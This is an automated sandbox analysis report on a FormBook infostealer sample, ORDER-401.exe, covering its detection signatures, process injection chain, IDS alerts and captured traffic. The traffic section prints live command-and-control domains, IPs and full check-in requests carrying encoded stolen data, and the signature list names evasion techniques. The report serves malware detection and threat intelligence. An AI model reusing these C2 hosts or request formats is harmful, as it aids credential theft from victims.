Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER-401.exe

Overview

General Information

Sample name:ORDER-401.exe
Analysis ID:1574061
MD5:3dfa099ee923a3f449f97ca8f522f703
SHA1:b2aece2499d5d90eb59d7e0d8a908c162d7e70f1
SHA256:756abd1273244ba91c1b9bd7bb86182e9012e12f2599cb715f9757cc34e3a81e
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ORDER-401.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\ORDER-401.exe" MD5: 3DFA099EE923A3F449F97CA8F522F703)
    • ORDER-401.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\ORDER-401.exe" MD5: 3DFA099EE923A3F449F97CA8F522F703)
      • PcwrDoOfOMD.exe (PID: 6036 cmdline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 6636 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • PcwrDoOfOMD.exe (PID: 5240 cmdline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4884 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.ORDER-401.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.ORDER-401.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:38:10.419837+010020507451Malware Command and Control Activity Detected192.168.2.849714161.97.142.14480TCP
                2024-12-12T21:38:36.355592+010020507451Malware Command and Control Activity Detected192.168.2.849718107.155.56.3080TCP
                2024-12-12T21:38:52.357197+010020507451Malware Command and Control Activity Detected192.168.2.84972218.139.62.22680TCP
                2024-12-12T21:39:15.387860+010020507451Malware Command and Control Activity Detected192.168.2.849726209.74.77.10780TCP
                2024-12-12T21:39:30.889518+010020507451Malware Command and Control Activity Detected192.168.2.849730154.205.159.11680TCP
                2024-12-12T21:39:45.713532+010020507451Malware Command and Control Activity Detected192.168.2.8497343.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:38:10.419837+010028554651A Network Trojan was detected192.168.2.849714161.97.142.14480TCP
                2024-12-12T21:38:36.355592+010028554651A Network Trojan was detected192.168.2.849718107.155.56.3080TCP
                2024-12-12T21:38:52.357197+010028554651A Network Trojan was detected192.168.2.84972218.139.62.22680TCP
                2024-12-12T21:39:15.387860+010028554651A Network Trojan was detected192.168.2.849726209.74.77.10780TCP
                2024-12-12T21:39:30.889518+010028554651A Network Trojan was detected192.168.2.849730154.205.159.11680TCP
                2024-12-12T21:39:45.713532+010028554651A Network Trojan was detected192.168.2.8497343.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T21:38:28.268922+010028554641A Network Trojan was detected192.168.2.849715107.155.56.3080TCP
                2024-12-12T21:38:30.964806+010028554641A Network Trojan was detected192.168.2.849716107.155.56.3080TCP
                2024-12-12T21:38:33.628273+010028554641A Network Trojan was detected192.168.2.849717107.155.56.3080TCP
                2024-12-12T21:38:44.284528+010028554641A Network Trojan was detected192.168.2.84971918.139.62.22680TCP
                2024-12-12T21:38:46.956483+010028554641A Network Trojan was detected192.168.2.84972018.139.62.22680TCP
                2024-12-12T21:38:49.641750+010028554641A Network Trojan was detected192.168.2.84972118.139.62.22680TCP
                2024-12-12T21:39:07.390754+010028554641A Network Trojan was detected192.168.2.849723209.74.77.10780TCP
                2024-12-12T21:39:10.051965+010028554641A Network Trojan was detected192.168.2.849724209.74.77.10780TCP
                2024-12-12T21:39:12.784154+010028554641A Network Trojan was detected192.168.2.849725209.74.77.10780TCP
                2024-12-12T21:39:22.706760+010028554641A Network Trojan was detected192.168.2.849727154.205.159.11680TCP
                2024-12-12T21:39:25.378330+010028554641A Network Trojan was detected192.168.2.849728154.205.159.11680TCP
                2024-12-12T21:39:28.050478+010028554641A Network Trojan was detected192.168.2.849729154.205.159.11680TCP
                2024-12-12T21:39:37.625829+010028554641A Network Trojan was detected192.168.2.8497313.33.130.19080TCP
                2024-12-12T21:39:40.722439+010028554641A Network Trojan was detected192.168.2.8497323.33.130.19080TCP
                2024-12-12T21:39:42.967531+010028554641A Network Trojan was detected192.168.2.8497333.33.130.19080TCP
                2024-12-12T21:39:53.867876+010028554641A Network Trojan was detected192.168.2.84973538.46.13.5480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JUAvira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: ORDER-401.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ORDER-401.exeJoe Sandbox ML: detected
                Source: ORDER-401.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER-401.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PcwrDoOfOMD.exe, 00000007.00000000.2018936585.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167501370.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER-401.exe, ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028CC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_028CC9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax8_2_028B9F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h8_2_02FD04D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 154.205.159.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49718 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49718 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 154.205.159.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 154.205.159.116:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49726 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49726 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49714 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49714 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49734 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49734 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49722 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49722 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 38.46.13.54:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49730 -> 154.205.159.116:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49730 -> 154.205.159.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 107.155.56.30:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Thu, 12 Dec 2024 20:39:22 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Thu, 12 Dec 2024 20:39:25 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: GET /gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?84EhVDY=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmW5Tm5D5tQBI3B1+VDfuWeAsbbOCckpfS6ddEbXQs3erVRA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a6qk/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsS95xRIWFjwm0Cd59BaWixf9mBuP0aMIhNaQDKqAQJAIXVg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.learnwithus.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jijievo.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.likesharecomment.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.likesharecomment.net
                Source: global trafficDNS traffic detected: DNS query: www.397256.pink
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 38 34 45 68 56 44 59 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 53 53 35 64 63 77 6d 31 67 4b 5a 59 2b 35 35 56 6e 37 54 47 77 6a 6e 65 73 2b 67 65 55 43 31 74 67 76 55 6f 44 54 30 3d Data Ascii: 84EhVDY=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSS5dcwm1gKZY+55Vn7TGwjnes+geUC1tgvUoDT0=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:38:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 